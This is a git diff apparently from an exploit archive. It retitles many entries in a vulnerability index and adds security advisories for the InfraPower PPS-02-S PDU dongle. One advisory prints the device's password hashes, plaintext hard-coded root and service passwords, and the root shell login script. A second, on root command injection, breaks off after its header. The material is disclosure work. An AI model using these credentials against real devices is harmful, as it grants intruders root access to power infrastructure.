diff --git a/files.csv b/files.csv
index 36fa74c4d..e6be23fc0 100755
--- a/files.csv
+++ b/files.csv
@@ -4610,53 +4610,53 @@ id,file,description,date,author,platform,type,port
4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Buffer Overflow",2008-01-22,Elazar,windows,remote,0
4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection",2008-01-22,S@BUN,php,webapps,0
4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
-4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
+4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
-4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
-4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
+4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
+4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,windows,remote,0
-4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
+4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - 'story' Parameter SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
-4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
+4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
4971,platforms/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0
-4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
-4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
-4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution",2008-01-23,h07,windows,remote,0
-4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - (newlang) Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
-4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - (update) Local File Inclusion",2008-01-23,Stack,php,webapps,0
+4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
+4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
+4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution",2008-01-23,h07,windows,remote,0
+4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
+4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion",2008-01-23,Stack,php,webapps,0
4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0
4978,platforms/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos,0
4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Buffer Overflow",2008-01-24,Elazar,windows,remote,0
-4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
-4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
+4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'files' Parameter Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
+4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
4982,platforms/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0
-4985,platforms/php/webapps/4985.txt,"flinx 1.3 - (category.php id) SQL Injection",2008-01-25,Houssamix,php,webapps,0
+4985,platforms/php/webapps/4985.txt,"flinx 1.3 - 'id' Parameter SQL Injection",2008-01-25,Houssamix,php,webapps,0
4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method Exploit",2008-01-25,plan-s,windows,remote,0
-4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - AddFile() Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
+4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0
-4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0
+4989,platforms/php/webapps/4989.txt,"Simple Forum 3.2 - File Disclosure / Cross-Site Scripting",2008-01-26,tomplixsee,php,webapps,0
4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps,0
4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0
-4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
-4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
-4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
-4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
+4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
+4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
+4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
+4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0
4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0
4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0
4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0
-5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
-5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0
-5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - pollid SQL Injection",2008-01-29,D4m14n,php,webapps,0
-5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
-5004,platforms/windows/local/5004.c,"SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
+5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
+5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Parameter Remote File Disclosure",2008-01-28,Stack,php,webapps,0
+5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - 'pollid' Parameter SQL Injection",2008-01-29,D4m14n,php,webapps,0
+5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
+5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0
-5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
-5007,platforms/php/webapps/5007.txt,"Mambo Component NewsLetter - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
-5008,platforms/php/webapps/5008.txt,"Mambo Component Fq - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
-5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
+5007,platforms/php/webapps/5007.txt,"Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5008,platforms/php/webapps/5008.txt,"Mambo 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5009,platforms/php/webapps/5009.txt,"Mambo 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0
5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0
5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0
@@ -26419,16 +26419,16 @@ id,file,description,date,author,platform,type,port
29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0
-29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 - archive.php SQL Injection",2007-01-02,"Javor Ninov",php,webapps,0
29376,platforms/php/webapps/29376.txt,"VCard Pro - gbrowse.php Cross-Site Scripting",2007-01-02,exexp,php,webapps,0
29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0
@@ -29720,7 +29720,7 @@ id,file,description,date,author,platform,type,port
32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0
32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0
32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0
-32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'ask/search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
+32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps,0
32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0
32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0
@@ -36728,6 +36728,13 @@ id,file,description,date,author,platform,type,port
40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0
40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0
40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0
+40642,platforms/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,php,webapps,0
+40644,platforms/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,php,webapps,0
+40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0
+40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple XSS",2016-10-28,LiquidWorm,php,webapps,0
+40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0
+40643,platforms/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote,0
+40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0
40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial Of Service",2016-10-27,"Peter Baris",windows,dos,0
40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0
diff --git a/platforms/hardware/remote/40643.txt b/platforms/hardware/remote/40643.txt
new file mode 100755
index 000000000..b51140711
--- /dev/null
+++ b/platforms/hardware/remote/40643.txt
@@ -0,0 +1,195 @@
+InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: InfraPower suffers from a use of hard-coded credentials. The IP
+dongle firmware ships with hard-coded accounts that can be used to gain
+full system access (root) using the telnet daemon on port 23.
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5371
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php
+
+
+27.09.2016
+
+--
+
+
+# cat /etc/passwd
+
+root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
+bin:x:1:1:bin:/bin:/bin/sh
+daemon:x:2:2:daemon:/usr/sbin:/bin/sh
+adm:x:3:4:adm:/adm:/bin/sh
+lp:x:4:7:lp:/var/spool/lpd:/bin/sh
+sync:x:5:0:sync:/bin:/bin/sync
+shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
+operator:x:11:0:Operator:/var:/bin/sh
+nobody:x:99:99:nobody:/home:/bin/sh
+admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
+user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
+service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
+www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
+www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
+
+# showing accounts in root group:
+
+Username: root
+Password: 8475
+--
+Username: service
+Password: ipdongle
+--
+Username: www
+Password: 9311
+--
+Username: www2
+Password: 9311
+
+# showing other less-privileged accounts:
+
+Username: user
+Password: 8475
+--
+Username: admin
+Password: 8475
+
+--------
+
+/mnt/mtd # echo $SHELL
+/sbin/root_shell.sh
+/mnt/mtd # cat /sbin/root_shell.sh
+#!/bin/sh
+trap "" 2 3 9 24
+
+# check login
+passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`
+
+if [ "$passWork" = "1" ]; then
+ login_file=/mnt/mtd/root_login
+ now_timestamp=`date +%s`
+
+ if [ -f $login_file ]; then
+ line=`wc -l $login_file | cut -c 1-9`
+ if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then
+ pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
+ pre_result1=`echo $pre_login | cut -d " " -f 1`
+ pre_result2=`echo $pre_login | cut -d " " -f 2`
+ pre_result3=`echo $pre_login | cut -d " " -f 3`
+ if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
+ pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
+ result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
+ if [ "$result" != "success" ]; then
+ echo $result
+ exit 0
+ fi
+ fi
+ fi
+ fi
+
+ echo -n "password:"
+ read pass
+ if [ "$pass" != "999" ]; then
+ echo "wrong password"
+ echo fail $now_timestamp >> $login_file
+ exit 0
+ fi
+ echo success $now_timestamp >> $login_file
+fi
+
+/bin/sh
+/mnt/mtd #
+
+--------
+
+/mnt/mtd # ls
+IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf
+PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf
+PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log
+
+--------
+
+/mnt/mtd # df -h
+
+Filesystem Size Used Available Use% Mounted on
+tmpfs 256.0M 4.0K 256.0M 0% /tmp
+/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd
+/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1
+/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2
+/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3
+
+--------
+
+/www # ls -al
+
+drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 .
+drwxr-xr-x 16 root root 0 Nov 28 11:17 ..
+-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php
+-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php
+-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php
+-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php
+-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php
+-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php
+drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General
+-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php
+-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php
+drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images
+drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript
+-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php
+-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php
+-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php
+-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php
+-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php
+-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php
+-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php
+-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php
+-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php
+-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php
+-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php
+-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php
+-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php
+-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php
+-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php
+-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php
+-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php
+-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php
+-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php
+-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php
+-rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php
+-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php
+-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php
+-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php
+-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php
+-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php
+-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php
+-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php
+-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php
+-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh
+-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php
+-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php
+-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php
+
diff --git a/platforms/hardware/webapps/40640.txt b/platforms/hardware/webapps/40640.txt
new file mode 100755
index 000000000..fdd37727d
--- /dev/null
+++ b/platforms/hardware/webapps/40640.txt
@@ -0,0 +1,348 @@
+InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: InfraPower suffers from multiple unauthenticated remote command
+injection vulnerabilities. The vulnerability exist due to several POST
+parameters in several scripts not being sanitized when using the exec(),
+proc_open(), popen() and shell_exec() PHP function while updating the
+settings on the affected device. This allows the attacker to execute
+arbitrary system commands as the root user and bypass access controls in
+place.
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5372
